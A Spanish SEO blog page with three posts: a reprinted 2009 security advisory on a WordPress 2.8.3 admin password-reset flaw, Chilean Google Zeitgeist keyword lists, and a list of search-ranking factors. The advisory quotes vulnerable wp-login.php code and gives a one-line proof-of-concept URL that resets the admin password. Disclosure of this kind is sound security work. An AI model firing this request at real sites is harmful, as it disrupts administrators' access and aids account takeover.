SEO Business

Wordpress 2.8.3 : Vulnerabilidad : Reseteo : password: admin

admin — Fri, 29 Jan 2010 21:21:57 +0000

Una vulnerabilidad se ha encontrado en Wordpress 2.8.3 y todos los anteriores. Fue descubierta por Laurent Gaffié, mejor hagan una actualización a wordpress 2.8.4.La probé y era cierta, hacías un http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]= y te mandaba un password reseteado a tu cuenta de mail. Ok , hasta ahí no hay mucho problema, pero imagínense, que puedan inyectar otra password, en el arreglo key[], ahí sí que sería un poco , y no tan poco, más bien bastante heavy….Actualizar es la idea ahora la última versión.

Bajar Wordpress última Versión

=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password II. BACKGROUND ------------------------- WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it. III. DESCRIPTION ------------------------- The way Wordpress handle a password reset looks like this: You submit your email adress or username via this form /wp-login.php?action=lostpassword ; Wordpress send you a reset confirmation like that via email: " Someone has asked to reset the password for the following site and username. http://DOMAIN_NAME.TLD/wordpress Username: admin To reset your password visit the following address, otherwise just ignore this email and nothing will happen http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag " You click on the link, and then Wordpress reset your admin password, and sends you over another email with your new credentials. Let's see how it works: wp-login.php: ...[snip].... line 186: function reset_password($key) {     global $wpdb;     $key = preg_replace('/[^a-z0-9]/i', '', $key);     if ( empty( $key ) )         return new WP_Error('invalid_key', __('Invalid key'));     $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]....

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
...[snip ]...

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.

IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficiant to reproduce this Proof of concept:

http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=

The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch aviable for the moment.

VIII. REFERENCES
-------------------------

http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for them great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]

Google Chile Zeitgeist 2009 y 2008

admin — Fri, 29 Jan 2010 21:00:22 +0000

Las palabras claves más buscadas en google.cl en el año 2008fueron publicadas en el sitio oficial de Google. Cabe destacar que viendo bien, los resultados arrojados para Chile, y otros países, podemos ver una gran apuesta por el contenido social. Lo otro interesante a destacar que la palabra clave Facebook, se esta buscando, o sea, los usuarios no ingresan directamente a facebook.com, sino mas bien estan utilizando a Google como portal.

Según el sitio Oficial de Google Zeitgeist: Este ha sido un año de cambios en el país y la gente ha utilizado Google para informarse acerca de estos cambios. Las búsquedas más activas incluyeron términos de la actualidad política y económica tales como la búsqueda de empleos y conceptos técnicos que afectaron directamente a los consumidores y usuarios a nivel nacional como la Unidad de Fomento (UF) o el dólar.

Zeitgeist 2009

Celebridades

michael jackson
daddy yankee
jonas brothers
megan fox
robert pattinson
la noche
lucila vit
lady gaga
pamela díaz
metallica

Servicios Públicos

sii
inp
registro civil
sii.cl
fonasa
transantiago
inp.cl
www.inp.cl
mineduc
poder judicial

Emergentes

facebook
taringa
inp
youtube
ben 10
traductor google
banco estado
hotmail
kaskus
lady gaga

Economía

banco estado
banco de chile
banco santander
santander santiago
credichile
banefe
banco central
scotiabank
banco del desarrollo
bolsa de santiago

Deportes

cdf
rojadirecta
anfp
espn
colo-colo
universidad de chile
universidad catolica
roja directa
juegos de fútbol
unión española

Zeitgeist 2008

Emergentes (Fastest Rising)

facebook ( Estimado de Wordtracker: 223,228 visitas al día)
rapidshare (Estimado de visitas: 1,993)
juegos.com (Estimado de visitas: 88 )
habbo ( Estimado: 1,718)
youtube (Estimado: 278,575)
cdf (Estimado: 235 )
rastro ( Estimado: 9 )
naruto (Estimado:29,397 )
vtr (Estimado: 34 )
movistar (Estimado: 141)

*Las estimaciones son según Wordtracker al día de hoy 10 de Diciembre de 2008. Y hay que tener en cuenta que estas son estimaciones globales, y no son precisamente concordantes a la realidad local.

Factores importantes para un buen posicionamiento en los buscadores

admin — Fri, 29 Jan 2010 20:53:57 +0000

Mucho se ha hablado sobre cuáles son los factores que Googletoma en cuenta para un posicionamiento en su buscador. Como bien dijo Matt Cutts, hay más de 200 factores que Google toma en cuenta para hacer un ranking de una página en particular. Sin ser, ni pretender ser la voz oficial de esto, pues no la soy(o si no, sería millonario), entregaré mi parecer con respecto a cuales son algunas de estos factores a tomar en cuenta.
Ahora bien, recogiendo algunos otros comentarios en la web, como el de Vanesa Fox (ex Google a cargo de Webmaster Tools), y lo que expreso Matt Cutts, el Page Rank se divide en dos, uno que es el que sale en el ToolBar( desde el 1 al 10, digámosle PRT) y el que usa Google Internamente(Llamémosle PRI).

1.- Historia del dominio (¿ha cambiado de dueño?, ¿Cuánto tiempo el sitio tiene?…etc.)

2.- Historia de los vínculos y la Calidad de estos ( ¿Han crecido en forma natural a través del tiempo, La gente que visita el sitio, ¿se queda por algún tiempo o salen inmediatamente?, ¿Cual es la proporción entre vínculos de calidad y de baja calidad que tiene el sitio?…etc.)

3.- Historia del Contenido y la generación de este ( ¿Está escrito en forma natural?, ¿Cómo se compara con contenidos de sitios deSpam?, ¿Cómo se compara el Contenido con respecto a los libros que ha escaneado Google?..etc.)

4.-Uso de los Datos (Datos de Google Toolbar, Google Account; Si tienes Rss feed, ¿la gente se subscribe?;¿Cual es la frecuencia de revisitas en tu sitio?;¿Esta la gente hablando de tu sitio , a través deGmail o Gtalk?…)

5.- Tu nombre de sitio o marca (¿Los usuarios buscan tu marca, o nombre de sitio?;¿Hay blog acerca de tu sitio, o los usuario están hablando de ellos en las plataformas de blogging?; ¿Hay citas de tu sitio o marca en Google News?..)

6.- Palabras Claves, Keywords(Si tienes google adwords, ¿qué hacen las vistas después de hacer click en tu ad?; ¿Cuales otros sitios están publicitando similares keywords; Que proporción tiene tu sitio en el mercado, para ello usan Google checkout, El histórico de Adwords, Google Analytics….etc.)

7.- ¿Cuales sitios te visitan a menudo? ( ¿Tienen los mismos datos del Whois?; La gente que te visita, ¿visita sitios de la misma temática? ; ¿Son confiables sitios, o son más relacionados a Spam?..)

Google al tener tantos productos, como Analytics, Reader, Gmail,Gtalk, feedburner, toolbars, los ads, y más, se puede hacer una buena idea de cómo tu sitio es visto en internet, y esto suma y sigue, así que creo que las técnicas que uno utilice tendrán que empezar a variar, pero sin dejar de lado, que el contenido es el Rey.